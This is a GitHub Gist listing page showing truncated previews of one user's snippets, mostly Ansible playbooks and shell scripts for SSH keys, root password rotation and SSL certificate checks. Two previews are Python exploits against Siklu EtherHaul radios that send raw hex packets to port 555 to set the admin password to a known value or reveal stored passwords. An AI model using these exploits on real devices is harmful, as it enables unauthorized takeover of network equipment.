Skip to content

Instantly share code, notes, and snippets.

Ian ianling

Block or report user

Report or block ianling

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@ianling
ianling / generate_ssh_certs.yml
Created Oct 3, 2017
Ansible Playbook for generating and adding SSH certificates for a user on remote hosts
View generate_ssh_certs.yml
---
- name: Set up sshcerts for ianl
hosts: all
remote_user: ianl
tasks:
- name: Generate a unique key for each host
local_action: command /usr/bin/ssh-keygen -b 2048 -t rsa -f /home/ianl/sshkeys/{{ inventory_hostname }} -q -N ""
become: no
@ianling
ianling / siklu_etherhaul_setpw.py
Created Dec 29, 2016
Siklu EtherHaul Set Password Exploit
View siklu_etherhaul_setpw.py
import socket
from time import sleep
#this sets the password to 'Abc123123'
target = '1.2.3.4'
admin = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x39\x00\x00\x00\x00\x61\x64\x6d\x69\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
setpassword = bytearray(b'\x73\x69\x6d\x70\x6c\x65\x2d\x63\x6f\x6d\x6d\x61\x6e\x64\x20\x73\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6d\x69\x6e\x20\x74\x79\x70\x65\x20\x61\x64\x6d\x69\x6e\x20\x70\x61\x73\x73\x77\x20\x41\x62\x63\x31\x32\x33\x31\x32\x33\x00') #Abc123123
@ianling
ianling / siklu_etherhaul_showpw.py
Last active Feb 23, 2017
Siklu EtherHaul Show Password Exploit
View siklu_etherhaul_showpw.py
import socket
from time import sleep
address = '192.168.1.11' # the target
port = 555
# set up binary strings to send to the radio
root = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x00\x00\x00\x72\x6f\x6f\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
moinfo = bytearray(b'\x6d\x6f\x2d\x69\x6e\x66\x6f\x20\x73\x79\x73\x74\x65\x6d\x20\x3b\x20\x6e\x74\x70\x20\x3b\x20\x69\x70\x20\x3b\x20\x69\x70\x76\x36\x20\x3b\x20\x65\x74\x68\x20\x3b\x20\x61\x61\x61\x2d\x73\x65\x72\x76\x65\x72\x20\x3b\x20\x61\x61\x61\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x6d\x6e\x6
@ianling
ianling / check_ssl_cert.sh
Last active Apr 14, 2016
Bash script that checks each Let's Encrypt cert to make sure it won't expire soon
View check_ssl_cert.sh
#!/bin/bash
for cert in `find /etc/letsencrypt/live -name 'cert.pem'` ; do
certpath=`/usr/bin/dirname $cert`
website=`basename $certpath`
if /usr/bin/openssl x509 -checkend 2592000 -noout -in $cert ; then
echo "Cert for $website is good"
else
echo "**Cert for $website is bad**"
fi
done
@ianling
ianling / check_ssl_cert.yml
Created Apr 14, 2016
Runs a Bash script that checks SSL certificate expiry
View check_ssl_cert.yml
---
- name: Check if SSL certs will expire soon
hosts: servers-with-ssl-certs
remote_user: backup
tasks:
- name: Run the SSL cert check script
script: /usr/local/bin/check_ssl_cert.sh
register: scriptoutput
- name: Print script output
@ianling
ianling / setup_user_sshcerts.yml
Created Apr 14, 2016
Creates SSH certificates for passwordless login
View setup_user_sshcerts.yml
---
- name: Set up sshcerts for MYUSER
hosts: all
remote_user: MYUSER
tasks:
- name: Generate a unique key for this host
local_action: command /usr/bin/ssh-keygen -b 2048 -t rsa -f /home/MYUSER/sshkeys/{{ inventory_hostname }} -q -N ""
- name: Create /backup/.ssh recursively
@ianling
ianling / bootstrap.yml
Last active Oct 12, 2017
Used after backup_user_setup.yml to push basic config changes
View bootstrap.yml
---
- name: Roll out basic config changes to a new server
hosts: all
remote_user: backup
become: yes
tasks:
- name: Disable root login in sshd_config
lineinfile: "dest=/etc/ssh/sshd_config
regexp='^PermitRootLogin '
View primes.py
print 2 # ...
i = 3
while True:
divisorMax = (i/2)
prime = True
for divisor in range(3,divisorMax,2):
if i % divisor == 0:
prime = False
break
if prime:
@ianling
ianling / change_root_pw.yml
Created Dec 10, 2015
Sets the root password of a remote host to a randomly generated one. The new password gets stored locally in plaintext at /backup/passwords/<hostname>
View change_root_pw.yml
---
- name: Change the root password and store the updated password locally in /backup/passwords/<hostname>
hosts: all
remote_user: backup
vars:
plaintextpw: "{{ lookup('password', '/backup/passwords/'+inventory_hostname+' chars=ascii_letters,digits,hexdigits,punctuation,, length=20') }}"
tasks:
- name: Remove the old password file, if it exists
@ianling
ianling / backup_user_setup.yml
Created Dec 9, 2015
Sets up a backup user with passwordless sudo. Sets up key-based ssh authentication automatically.
View backup_user_setup.yml
---
- name: Set up backup user to be used by Ansible
hosts: all
remote_user: <an existing user>
roles:
- yaegashi.blockinfile
tasks:
- name: Generate a unique key for this host
You can’t perform that action at this time.